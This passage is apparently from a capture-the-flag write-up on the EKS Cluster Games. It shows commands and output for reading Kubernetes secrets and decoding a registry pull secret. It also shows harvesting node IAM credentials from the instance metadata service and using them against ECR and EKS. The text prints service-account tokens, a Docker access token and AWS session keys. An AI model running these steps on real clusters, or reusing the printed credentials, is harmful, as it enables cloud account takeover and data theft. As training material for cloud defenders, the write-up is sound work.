        token: eyJhbGciOiJSUzI1NiIsImtpZCI6IjM3NTcyZTczM2RmZjExYmUyNzIwOTgzNzBhMjgyOGE5MThiNGVmNjYifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTcyMzk5MzI3MywiaWF0IjoxNzIzOTg5NjczLCJpc3MiOiJodHRwczovL29pZGMuZWtzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2lkL0MwNjJDMjA3QzhGNTBERTRFQzI0QTM3MkZGNjBFNTg5Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJjaGFsbGVuZ2UxIiwic2VydmljZWFjY291bnQiOnsibmFtZSI6InNlcnZpY2UtYWNjb3VudC1jaGFsbGVuZ2UxIiwidWlkIjoiYjQyMTc5YTYtMjM4Yi00ZDQ2LThkNjAtNDhkNzRkN2MxNDVlIn19LCJuYmYiOjE3MjM5ODk2NzMsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjaGFsbGVuZ2UxOnNlcnZpY2UtYWNjb3VudC1jaGFsbGVuZ2UxIn0.TQtjzoOt6irtX7V67-rFY4G_gwNVfwvWuydi37dPv-TEhlIasbklHfVnkPfDOPRtFx4Pm1iIR-6xJqwAgozLG62NkLdwvBBIhIBovzyaBgMkd-l044UcPxdF_hkJ2F8hYS8YfkovO1Mv9a0VR9plxoCwb-CSjR416pwV7a5JRaWbMh0NbOD0mX0D20BJ-P9Fu_6yvTUASVDYZvMjp5Vz59IKgt45rI4WHTAPA3LGtFFl2QsYeOq3CRAuefdRMCSIlTS8H9i8FXPlFKS61NVpo5uDEZo7vaPT4gM3yk05wNTX3SKLSZiKdmyV0o4scdZNI_u2HzK0XoYWsR__ZiwoMA

First, try operations such as get and list.

    kubectl get secrets
    NAME         TYPE     DATA   AGE
    log-rotate   Opaque   1      291d

The -o output option is needed here; otherwise the data itself is not shown.



    kubectl get secrets log-rotate -n challenge1 -o yaml
    apiVersion: v1
    data:
      flag: d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==
    kind: Secret
    metadata:
      creationTimestamp: "2023-11-01T13:02:08Z"
      name: log-rotate
      namespace: challenge1
      resourceVersion: "890951"
      uid: 03f6372c-b728-4c5b-ad28-70d5af8d387c
    type: Opaque
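
Values under data in a Secret are base64-encoded, not encrypted, so reading the flag is a single decode. A minimal Python sketch, with a helper name chosen for this example:

```python
import base64


def decode_secret_data(data: dict[str, str]) -> dict[str, str]:
    """Base64-decode every value in a Kubernetes Secret's data map."""
    return {key: base64.b64decode(value).decode("utf-8") for key, value in data.items()}


# The data map from the log-rotate Secret shown above.
secret_data = {
    "flag": "d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==",
}
print(decode_secret_data(secret_data)["flag"])
```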

Security considerations for K8s Secrets

Registry Hunt

A thing we learned during our research: always check the container registries.

For your convenience, the crane utility is already pre-installed on the machine.

Both secrets and pods are available.

    {
      "apiVersion": "v1",
      "kind": "Pod",
      "metadata": {
        "annotations": {
          "kubernetes.io/psp": "eks.privileged",
          "pulumi.com/autonamed": "true"
        },
        "creationTimestamp": "2023-11-01T13:32:05Z",
        "name": "database-pod-2c9b3a4e",
        "namespace": "challenge2",
        "resourceVersion": "113847456",
        "uid": "57fe7d43-5eb3-4554-98da-47340d94b4a6"
      },
      "spec": {
        "containers": [
          {
            "image": "eksclustergames/base_ext_image",
            "imagePullPolicy": "Always",
            "name": "my-container",
            "resources": {},
            "terminationMessagePath": "/dev/termination-log",
            "terminationMessagePolicy": "File",
            "volumeMounts": [
              {
                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount",
                "name": "kube-api-access-cq4m2",
                "readOnly": true
              }
            ]
          }
        ],
        "dnsPolicy": "ClusterFirst",
        "enableServiceLinks": true,
        "imagePullSecrets": [
          {
            "name": "registry-pull-secrets-780bab1d"
          }
        ],
        "nodeName": "ip-192-168-21-50.us-west-1.compute.internal",
        "preemptionPolicy": "PreemptLowerPriority",
        "priority": 0,
        "restartPolicy": "Always",
        "schedulerName": "default-scheduler",
        "securityContext": {},
        "serviceAccount": "default",
        "serviceAccountName": "default",
        "terminationGracePeriodSeconds": 30,
        "tolerations": [
          {
            "effect": "NoExecute",
            "key": "node.kubernetes.io/not-ready",
            "operator": "Exists",
            "tolerationSeconds": 300
          },
          {
            "effect": "NoExecute",
            "key": "node.kubernetes.io/unreachable",
            "operator": "Exists",
            "tolerationSeconds": 300
          }
        ],
        "volumes": [
          {
            "name": "kube-api-access-cq4m2",
            "projected": {
              "defaultMode": 420,
              "sources": [
                {
                  "serviceAccountToken": {
                    "expirationSeconds": 3607,
                    "path": "token"
                  }
                },
                {
                  "configMap": {
                    "items": [
                      {
                        "key": "ca.crt",
                        "path": "ca.crt"
                      }
                    ],
                    "name": "kube-root-ca.crt"
                  }
                },
                {
                  "downwardAPI": {
                    "items": [
                      {
                        "fieldRef": {
                          "apiVersion": "v1",
                          "fieldPath": "metadata.namespace"
                        },
                        "path": "namespace"
                      }
                    ]
                  }
                }
              ]
            }
          }
        ]
      },
      "status": {
        "conditions": [
          {
            "lastProbeTime": null,
            "lastTransitionTime": "2023-11-01T13:32:05Z",
            "status": "True",
            "type": "Initialized"
          },
          {
            "lastProbeTime": null,
            "lastTransitionTime": "2024-08-17T16:30:35Z",
            "status": "True",
            "type": "Ready"
          },
          {
            "lastProbeTime": null,
            "lastTransitionTime": "2024-08-17T16:30:35Z",
            "status": "True",
            "type": "ContainersReady"
          },
          {
            "lastProbeTime": null,
            "lastTransitionTime": "2023-11-01T13:32:05Z",
            "status": "True",
            "type": "PodScheduled"
          }
        ],
        "containerStatuses": [
          {
            "containerID": "containerd://038fbdd061f8d31fa1d17de2cb04a0153653fdfd65abc7bf46f418f443907b4a",
            "image": "docker.io/eksclustergames/base_ext_image:latest",
            "imageID": "docker.io/eksclustergames/base_ext_image@sha256:a17a9428af1cc25f2158dfba0fe3662cad25b7627b09bf24a915a70831d82623",
            "lastState": {
              "terminated": {
                "containerID": "containerd://e7b4aa2e7a9a8630a42ad8b1af4233028545296edcbe9f6bb8ec882dc2f4948c",
                "exitCode": 0,
                "finishedAt": "2024-08-17T16:30:33Z",
                "reason": "Completed",
                "startedAt": "2024-07-12T10:08:16Z"
              }
            },
            "name": "my-container",
            "ready": true,
            "restartCount": 8,
            "started": true,
            "state": {
              "running": {
                "startedAt": "2024-08-17T16:30:35Z"
              }
            }
          }
        ],
        "hostIP": "192.168.21.50",
        "phase": "Running",
        "podIP": "192.168.12.173",
        "podIPs": [
          {
            "ip": "192.168.12.173"
          }
        ],
        "qosClass": "BestEffort",
        "startTime": "2023-11-01T13:32:05Z"
      }
    }

Here imagePullSecrets -> name -> registry-pull-secrets-780bab1d means the image is pulled with credentials taken from the Secret resource of that name.

So we can run kubectl get secrets registry-pull-secrets-780bab1d

    kubectl get secrets registry-pull-secrets-780bab1d
    NAME                             TYPE                             DATA   AGE
    registry-pull-secrets-780bab1d   kubernetes.io/dockerconfigjson   1      291d

to fetch the corresponding data. dockerconfigjson holds the credentials used to pull images from a Docker image registry.

    apiVersion: v1
    data:
      .dockerconfigjson: eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19
    kind: Secret
    metadata:
      annotations:
        pulumi.com/autonamed: "true"
      creationTimestamp: "2023-11-01T13:31:29Z"
      name: registry-pull-secrets-780bab1d
      namespace: challenge2
      resourceVersion: "897340"
      uid: 1348531e-57ff-42df-b074-d9ecd566e18b
    type: kubernetes.io/dockerconfigjson

Base64-decoded, it reads:

    {
      "auths": {
        "index.docker.io/v1/": {
          "auth": "ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=="
        }
      }
    }

Decoding auth once more yields the credentials eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
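
The credential is wrapped in two layers of base64: the .dockerconfigjson value decodes to JSON, and each auth field inside it decodes to user:password. The Python sketch below does both steps. The function name is made up for this example, and the outer layer is rebuilt from the decoded JSON shown above instead of being copied from the Secret.

```python
import base64
import json


def parse_docker_auths(dockerconfigjson_b64: str) -> dict[str, tuple[str, str]]:
    """Map each registry in a .dockerconfigjson value to its (user, password) pair."""
    config = json.loads(base64.b64decode(dockerconfigjson_b64))
    result = {}
    for registry, entry in config["auths"].items():
        decoded = base64.b64decode(entry["auth"]).decode("utf-8")
        # Split on the first colon only, since passwords may contain colons.
        user, _, password = decoded.partition(":")
        result[registry] = (user, password)
    return result


inner = {
    "auths": {
        "index.docker.io/v1/": {
            "auth": "ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=="
        }
    }
}
sample = base64.b64encode(json.dumps(inner).encode()).decode()
print(parse_docker_auths(sample))
```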

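After logging in with crane, we have permission to pull the image as a tar.

    crane pull docker.io/eksclustergames/base_ext_image:latest /tmp/image.tar

A real EKS environment can look like this: the workload cluster has a large number of nodes, and to keep pods running the nodes pull private images from a remote container registry. To protect those private images and guard against supply chain attacks, the registry usually enforces authentication and authorization. The credentials a pod uses to reach the registry may then be stored in a Secret resource.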





Image Inquisition

A pod’s image holds more than just code. Dive deep into its ECR repository, inspect the image layers, and uncover the hidden secret.

Remember: You are running inside a compromised EKS pod.

For your convenience, the crane utility is already pre-installed on the machine.

    kubectl get pods
    NAME                      READY   STATUS    RESTARTS      AGE
    accounting-pod-876647f8   1/1     Running   8 (22h ago)   291d

    kubectl get pods accounting-pod-876647f8 -o json

    {
      "apiVersion": "v1",
      "kind": "Pod",
      "metadata": {
        "annotations": {
          "kubernetes.io/psp": "eks.privileged",
          "pulumi.com/autonamed": "true"
        },
        "creationTimestamp": "2023-11-01T13:32:10Z",
        "name": "accounting-pod-876647f8",
        "namespace": "challenge3",
        "resourceVersion": "113847436",
        "uid": "dd2256ae-26ca-4b94-a4bf-4ac1768a54e2"
      },
      "spec": {
        "containers": [
          {
            "image": "688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01",
            "imagePullPolicy": "IfNotPresent",
            "name": "accounting-container",
            "resources": {},
            "terminationMessagePath": "/dev/termination-log",
            "terminationMessagePolicy": "File",
            "volumeMounts": [
              {
                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount",
                "name": "kube-api-access-mmvjj",
                "readOnly": true
              }
            ]
          }
        ],
        "dnsPolicy": "ClusterFirst",
        "enableServiceLinks": true,
        "nodeName": "ip-192-168-21-50.us-west-1.compute.internal",
        "preemptionPolicy": "PreemptLowerPriority",
        "priority": 0,
        "restartPolicy": "Always",
        "schedulerName": "default-scheduler",
        "securityContext": {},
        "serviceAccount": "default",
        "serviceAccountName": "default",
        "terminationGracePeriodSeconds": 30,
        "tolerations": [
          {
            "effect": "NoExecute",
            "key": "node.kubernetes.io/not-ready",
            "operator": "Exists",
            "tolerationSeconds": 300
          },
          {
            "effect": "NoExecute",
            "key": "node.kubernetes.io/unreachable",
            "operator": "Exists",
            "tolerationSeconds": 300
          }
        ],
        "volumes": [
          {
            "name": "kube-api-access-mmvjj",
            "projected": {
              "defaultMode": 420,
              "sources": [
                {
                  "serviceAccountToken": {
                    "expirationSeconds": 3607,
                    "path": "token"
                  }
                },
                {
                  "configMap": {
                    "items": [
                      {
                        "key": "ca.crt",
                        "path": "ca.crt"
                      }
                    ],
                    "name": "kube-root-ca.crt"
                  }
                },
                {
                  "downwardAPI": {
                    "items": [
                      {
                        "fieldRef": {
                          "apiVersion": "v1",
                          "fieldPath": "metadata.namespace"
                        },
                        "path": "namespace"
                      }
                    ]
                  }
                }
              ]
            }
          }
        ]
      },
      "status": {
        "conditions": [
          {
            "lastProbeTime": null,
            "lastTransitionTime": "2023-11-01T13:32:10Z",
            "status": "True",
            "type": "Initialized"
          },
          {
            "lastProbeTime": null,
            "lastTransitionTime": "2024-08-17T16:30:33Z",
            "status": "True",
            "type": "Ready"
          },
          {
            "lastProbeTime": null,
            "lastTransitionTime": "2024-08-17T16:30:33Z",
            "status": "True",
            "type": "ContainersReady"
          },
          {
            "lastProbeTime": null,
            "lastTransitionTime": "2023-11-01T13:32:10Z",
            "status": "True",
            "type": "PodScheduled"
          }
        ],
        "containerStatuses": [
          {
            "containerID": "containerd://28abc7c8db6da76f3c78f250876cab51581c48dc04ef908501dadaead0980393",
            "image": "sha256:575a75bed1bdcf83fba40e82c30a7eec7bc758645830332a38cef238cd4cf0f3",
            "imageID": "688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01",
            "lastState": {
              "terminated": {
                "containerID": "containerd://e2473693bf87bb8bff3fe1b566a7ce9b518727186d1438245b7d6d2b450c362c",
                "exitCode": 0,
                "finishedAt": "2024-08-17T16:30:31Z",
                "reason": "Completed",
                "startedAt": "2024-07-12T10:08:14Z"
              }
            },
            "name": "accounting-container",
            "ready": true,
            "restartCount": 8,
            "started": true,
            "state": {
              "running": {
                "startedAt": "2024-08-17T16:30:32Z"
              }
            }
          }
        ],
        "hostIP": "192.168.21.50",
        "phase": "Running",
        "podIP": "192.168.5.251",
        "podIPs": [
          {
            "ip": "192.168.5.251"
          }
        ],
        "qosClass": "BestEffort",
        "startTime": "2023-11-01T13:32:10Z"
      }
    }

可以看到镜像的地址 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01

到这里是看不出什么东西的

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 curl http://169.254.169.254/latest/meta-data ami-id ami-launch-index ami-manifest-path block-device-mapping/ events/ hostname iam/ identity-credentials/ instance-action instance-id instance-life-cycle instance-type local-hostname local-ipv4 mac metrics/ network/ placement/ profile public-hostname public-ipv4 reservation-id security-groups services/ curl http://169.254.169.254/latest/meta-data/iam/info { "Code" : "Success" , "LastUpdated" : "2024-08-20T11:57:17Z" , "InstanceProfileArn" : "arn:aws:iam::688655246681:instance-profile/eks-36c5c399-cac4-2600-89ff-c478e8f231c5" , "InstanceProfileId" : "AIPA2AVYNEVM276Q75VCN" } curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole {"AccessKeyId" :"ASIA2AVYNEVM3I5SYZ4F" ,"Expiration" :"2024-08-20 13:47:56+00:00" ,"SecretAccessKey" :"WVcxMvqmXFXz77mJi1SWngOMOHOlOE4vvpzMnghg" ,"SessionToken" :"FwoGZXIvYXdzEGYaDPAqvItuLEhqLk6ijyK3AfUJvV+O++yT2Elxl7qIf0W/JTdM7WexcvvOvRNkZp+KhU/qyPae2zs4PqgIDMgnevoUcxqsXF6qSdDYzH8bbJBXQ6JoYEJIcdt74Kwv2Dz1poID1bVQDKiBkZxlfVqVhOpMUaIQSl5zWp5TfglPH1uvysSf0ppTMlpmroddDe0yJ4uOkzcLEBVZ3MY98dbN+x0CI3zt1EzX/Gir3z1Rv83ekwvqb5vkkRfIN+s6d2Tc8yvtgJA2CSj8oJK2BjIteEnt48zm2Xoflpda9y5NToeagbQ4OfN0xBkDMAogZJqTh1BJiQeuEmGF7awT" }

With the access key and secret key in hand, how can they be used to pull the image from ECR?

Reference: https://docs.aws.amazon.com/zh_cn/AmazonECR/latest/userguide/registry_auth.html

    aws ecr get-login-password --region us-west-1 | docker login --username AWS --password-stdin 688655246681.dkr.ecr.us-west-1.amazonaws.com

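Configure the credentials. I first tried `aws configure`, but its interactive prompts do not ask for a SessionToken, so the temporary credentials are exported as environment variables instead.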

    export AWS_ACCESS_KEY_ID="ASIA2AVYNEVM3I5SYZ4F"
    export AWS_SECRET_ACCESS_KEY="WVcxMvqmXFXz77mJi1SWngOMOHOlOE4vvpzMnghg"
    export AWS_SESSION_TOKEN="FwoGZXIvYXdzEGYaDPAqvItuLEhqLk6ijyK3AfUJvV+O++yT2Elxl7qIf0W/JTdM7WexcvvOvRNkZp+KhU/qyPae2zs4PqgIDMgnevoUcxqsXF6qSdDYzH8bbJBXQ6JoYEJIcdt74Kwv2Dz1poID1bVQDKiBkZxlfVqVhOpMUaIQSl5zWp5TfglPH1uvysSf0ppTMlpmroddDe0yJ4uOkzcLEBVZ3MY98dbN+x0CI3zt1EzX/Gir3z1Rv83ekwvqb5vkkRfIN+s6d2Tc8yvtgJA2CSj8oJK2BjIteEnt48zm2Xoflpda9y5NToeagbQ4OfN0xBkDMAogZJqTh1BJiQeuEmGF7awT"
    export AWS_DEFAULT_REGION="us-west-1"

    aws ecr get-login-password --region us-west-1 | crane auth login 688655246681.dkr.ecr.us-west-1.amazonaws.com --username AWS --password-stdin
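Copying three long values by hand is error-prone, so the export step can be scripted. The following is a minimal sketch, not part of the original walkthrough: `json_field` and `imds_to_exports` are hypothetical helper names, the JSON parsing is deliberately naive (flat objects, no escaped quotes), and the field names are taken from the credentials response shown above.

```shell
#!/usr/bin/env bash
# Extract one string field from a flat JSON document on stdin.
# Naive on purpose: no nesting, no escaped quotes inside values.
json_field() {
  sed -n 's/.*"'"$1"'"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' | head -n 1
}

# Turn the credentials JSON from the metadata service into export statements.
imds_to_exports() {
  local json
  json="$(cat)"
  printf 'export AWS_ACCESS_KEY_ID="%s"\n'     "$(json_field AccessKeyId     <<<"$json")"
  printf 'export AWS_SECRET_ACCESS_KEY="%s"\n' "$(json_field SecretAccessKey <<<"$json")"
  printf 'export AWS_SESSION_TOKEN="%s"\n'     "$(json_field SessionToken    <<<"$json")"
}
```

A possible use is to pipe the `curl` response for the security-credentials path into `imds_to_exports` and `eval` the result in the shell that will run `aws`.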

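After logging in, pulling by the image ID alone failed.

The reference needs the `@sha256:` digest appended to the repository name so that it identifies the image; then the pull works.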

    crane pull 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01 /tmp/image.tar
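A digest reference is easy to break when it is copied out of wrapped terminal output, since a single stray space invalidates it. As a rough sketch (the function name `parse_digest_ref` is made up for illustration), the reference can be split into registry, repository and digest and checked before it is handed to `crane`:

```shell
#!/usr/bin/env bash
# Split "registry/repo@sha256:<hex>" into its parts and validate the digest.
# Prints registry, repository and digest on separate lines; returns 1 on a bad reference.
parse_digest_ref() {
  local ref="$1"
  local name="${ref%@*}"     # everything before the last '@'
  local digest="${ref#*@}"   # everything after the first '@'
  # A sha256 digest is exactly 64 lowercase hex characters.
  if [[ "$ref" != *@* || ! "$digest" =~ ^sha256:[0-9a-f]{64}$ ]]; then
    echo "invalid digest reference: $ref" >&2
    return 1
  fi
  printf '%s\n%s\n%s\n' "${name%%/*}" "${name#*/}" "$digest"
}
```

Running it on the reference from the pod status prints the ECR registry host, `central_repo-aaf4a7c`, and the digest; a reference with a space inside the digest is rejected.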

    aws ecr describe-repositories
    aws ecr list-images --repository-name central_repo-aaf4a7c

    crane manifest 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01

    crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01

    docker history --no-trunc

    {
      "architecture": "amd64",
      "config": {
        "Env": [
          "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
        ],
        "Cmd": [
          "/bin/sleep",
          "3133337"
        ],
        "ArgsEscaped": true,
        "OnBuild": null
      },
      "created": "2023-11-01T13:32:07.782534085Z",
      "history": [
        {
          "created": "2023-07-18T23:19:33.538571854Z",
          "created_by": "/bin/sh -c #(nop) ADD file:7e9002edaafd4e4579b65c8f0aaabde1aeb7fd3f8d95579f7fd3443cef785fd1 in / "
        },
        {
          "created": "2023-07-18T23:19:33.655005962Z",
          "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
          "empty_layer": true
        },
        {
          "created": "2023-11-01T13:32:07.782534085Z",
          "created_by": "RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit",
          "comment": "buildkit.dockerfile.v0"
        },
        {
          "created": "2023-11-01T13:32:07.782534085Z",
          "created_by": "CMD [\"/bin/sleep\" \"3133337\"]",
          "comment": "buildkit.dockerfile.v0",
          "empty_layer": true
        }
      ],
      "os": "linux",
      "rootfs": {
        "type": "layers",
        "diff_ids": [
          "sha256:3d24ee258efc3bfe4066a1a9fb83febf6dc0b1548dfe896161533668281c9f4f",
          "sha256:9057b2e37673dc3d5c78e0c3c5c39d5d0a4cf5b47663a4f50f5c6d56d8fd6ad5"
        ]
      }
    }

The layers and build history of an image can also leak useful information.
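Reading the whole config by eye works for one image but not for many. As an illustration only, a small filter can pull out `NAME=value` pairs whose name hints at a secret. The function name `scan_history_for_secrets` and the keyword list are assumptions chosen for this sketch, and the pattern will miss secrets stored under other names.

```shell
#!/usr/bin/env bash
# Read an image config (JSON text) on stdin and print NAME=value pairs
# whose NAME contains a secret-looking keyword. Purely pattern-based.
scan_history_for_secrets() {
  grep -oE '[A-Z0-9_]*(TOKEN|SECRET|PASSWORD|KEY)[A-Z0-9_]*=[^ "]+' | sort -u
}
```

With the login from earlier in place, piping the output of `crane config` for the image into `scan_history_for_secrets` would surface the `ARTIFACTORY_TOKEN` assignment from the build history shown above.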

Pod Break



You’re inside a vulnerable pod on an EKS cluster. Your pod’s service-account has no permissions. Can you navigate your way to access the EKS Node’s privileged service-account?

Please be aware: Due to security considerations aimed at safeguarding the CTF infrastructure, the node has restricted permissions

Since IAM credentials are available from the metadata service, grab them first.



    export AWS_ACCESS_KEY_ID="ASIA2AVYNEVM3PQVMEG3"
    export AWS_SECRET_ACCESS_KEY="aRQ6Pzj7iU+gf6wNzCZd1sN/iZCqeHI2fUqeiPvj"
    export AWS_SESSION_TOKEN="FwoGZXIvYXdzEGcaDC/ErEa1n3Bvv+8OyiK3AdVUcGnAigzIjLs0dUQ3Yr6tt+NSAh62dph99FYY4tuwnrXOR90iplv6jvppGMe27fQ2VhA0G7cOucXPVJlDZSEXfpC6ac1e1JS2eHf8/UqZLrTwlGu2Ng1jwaOrjq7/UGXTP4SmkffFCzS0gTE4A5hZv1nTllJsJWlAOC4jOSdvjbIqlouT6fs6XNxRY4BJcDhgp5zqtjxrwMtDPnJ4v9qlLsPBnvEWaLoEK71JeyiK124rxOVV5yjpw5K2BjItJQnlLPto7MRLl+qLx+plo4c8LtmOUWjFBj+GsM+HXUGwO3/sNlhw+/vZuhP3"
    export AWS_DEFAULT_REGION="us-west-1"

Connect kubectl to the EKS cluster by creating a kubeconfig file: https://docs.aws.amazon.com/zh_cn/eks/latest/userguide/create-kubeconfig.html

    aws sts get-caller-identity

    {
      "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
      "Account": "688655246681",
      "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
    }

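The node's IAM role name follows the pattern `[cluster name]-nodegroup-NodeInstanceRole`, so the cluster name here is `eks-challenge-cluster`.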
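The derivation of the cluster name from the caller identity can be sketched as a small helper. This assumes the naming pattern observed in this challenge; it is not something AWS guarantees for every node group, and `cluster_from_role_arn` is a hypothetical name.

```shell
#!/usr/bin/env bash
# Derive the cluster name from an assumed-role ARN, assuming the role is named
# "<cluster-name>-nodegroup-NodeInstanceRole". Returns 1 if the ARN does not fit.
cluster_from_role_arn() {
  local arn="$1"
  local rest="${arn#*:assumed-role/}"   # drop everything through "assumed-role/"
  local role="${rest%%/*}"              # drop the trailing "/<session-name>"
  local suffix="-nodegroup-NodeInstanceRole"
  [[ "$arn" == *:assumed-role/* && "$role" == *"$suffix" ]] || return 1
  printf '%s\n' "${role%"$suffix"}"
}
```

Feeding it the `Arn` value returned by `aws sts get-caller-identity` gives the value to pass as `--name` to the `aws eks` commands.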

My original plan was ``

Alternatively, `aws eks update-kubeconfig` and `aws eks get-token` handle this automatically.

    aws eks update-kubeconfig --region us-west-1 --name eks-challenge-cluster

    aws eks get-token --cluster-name eks-challenge-cluster
    {
      "kind": "ExecCredential",
      "apiVersion": "client.authentication.k8s.io/v1beta1",
      "spec": {},
      "status": {
        "expirationTimestamp": "2024-08-20T14:31:41Z",
        "token": "k8s-aws-v1.aHR0cHM6Ly9zdHMudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vP0FjdGlvbj1HZXRDYWxsZXJJZGVudGl0eSZWZXJzaW9uPTIwMTEtMDYtMTUmWC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BU0lBMkFWWU5FVk0zUFFWTUVHMyUyRjIwMjQwODIwJTJGdXMtd2VzdC0xJTJGc3RzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA4MjBUMTQxNzQxWiZYLUFtei1FeHBpcmVzPTYwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCUzQngtazhzLWF3cy1pZCZYLUFtei1TZWN1cml0eS1Ub2tlbj1Gd29HWlhJdllYZHpFR2NhREMlMkZFckVhMW4zQnZ2JTJCOE95aUszQWRWVWNHbkFpZ3pJakxzMGRVUTNZcjZ0dCUyQk5TQWg2MmRwaDk5RllZNHR1d25yWE9SOTBpcGx2Nmp2cHBHTWUyN2ZRMlZoQTBHN2NPdWNYUFZKbERaU0VYZnBDNmFjMWUxSlMyZUhmOCUyRlVxWkxyVHdsR3UyTmcxandhT3JqcTclMkZVR1hUUDRTbWtmZkZDelMwZ1RFNEE1aFp2MW5UbGxKc0pXbEFPQzRqT1NkdmpiSXFsb3VUNmZzNlhOeFJZNEJKY0RoZ3A1enF0anhyd010RFBuSjR2OXFsTHNQQm52RVdhTG9FSzcxSmV5aUsxMjRyeE9WVjV5anB3NUsyQmpJdEpRbmxMUHRvN01STGwlMkJxTHglMkJwbG80YzhMdG1PVVdqRkJqJTJCR3NNJTJCSFhVR3dPMyUyRnNObGh3JTJCJTJGdlp1aFAzJlgtQW16LVNpZ25hdHVyZT03Mjg3NzQ4OTYzMjMxNzMxZWMwOThjZDA2YTc5NzFhY2M5YjcxM2FkOGZmYjA4OTFlNzU4ZDg3MTIyNjY1ZmU1"
      }
    }



    kubectl --token "$TOKEN" get secrets node-flag -o yaml

In this task, you’ve acquired the Node’s service account credentials. For future reference, these credentials will be conveniently accessible in the pod for you.

Fun fact: The misconfiguration highlighted in this challenge is a common occurrence, and the same technique can be applied to any EKS cluster that doesn’t enforce IMDSv2 hop limit.
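For context on the hop limit mentioned in the challenge text: with IMDSv2 required and a PUT response hop limit of 1, the session-token response is dropped before it reaches a pod that sits behind an extra network hop, so the pod cannot read the node role's credentials this way. The sketch below only prints the corresponding `aws ec2 modify-instance-metadata-options` command per instance instead of running it. The wrapper name `print_imds_hardening_cmds` is hypothetical, and for managed node groups the setting would more typically live in the launch template.

```shell
#!/usr/bin/env bash
# Dry run: print (do not execute) one hardening command per instance ID.
# --http-tokens required              -> IMDSv2 only
# --http-put-response-hop-limit 1     -> token response cannot cross an extra hop
print_imds_hardening_cmds() {
  local id
  for id in "$@"; do
    printf 'aws ec2 modify-instance-metadata-options --instance-id %s --http-tokens required --http-put-response-hop-limit 1\n' "$id"
  done
}
```

Calling it with the instance ID from the caller identity output, `i-0cb922c6673973282`, prints a single command line that can be reviewed before use.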





Container Secrets Infrastructure

You’ve successfully transitioned from a limited Service Account to a Node Service Account! Great job. Your next challenge is to move from the EKS to the AWS account. Can you acquire the AWS role of the s3access-sa service account, and get the flag?





iam policy

trust policy

permissions



    kubectl get serviceaccounts
    NAME          SECRETS   AGE
    debug-sa      0         293d
    default       0         293d
    s3access-sa   0         293d

    kubectl get serviceaccounts debug-sa -o yaml
    apiVersion: v1
    kind: ServiceAccount
    metadata:
      annotations:
        description: This is a dummy service account with empty policy attached
        eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e
      creationTimestamp: "2023-10-31T20:07:37Z"
      name: debug-sa
      namespace: challenge5
      resourceVersion: "671929"
      uid: 6cb6024a-c4da-47a9-9050-59c8c7079904

    kubectl get serviceaccounts default -o yaml
    apiVersion: v1
    kind: ServiceAccount
    metadata:
      creationTimestamp: "2023-10-31T20:07:11Z"
      name: default
      namespace: challenge5
      resourceVersion: "671804"
      uid: 77bd3db6-3642-40d5-b8c1-14fa1b0cba8c

    kubectl get serviceaccounts s3access-sa -o yaml
    apiVersion: v1
    kind: ServiceAccount
    metadata:
      annotations:
        eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role
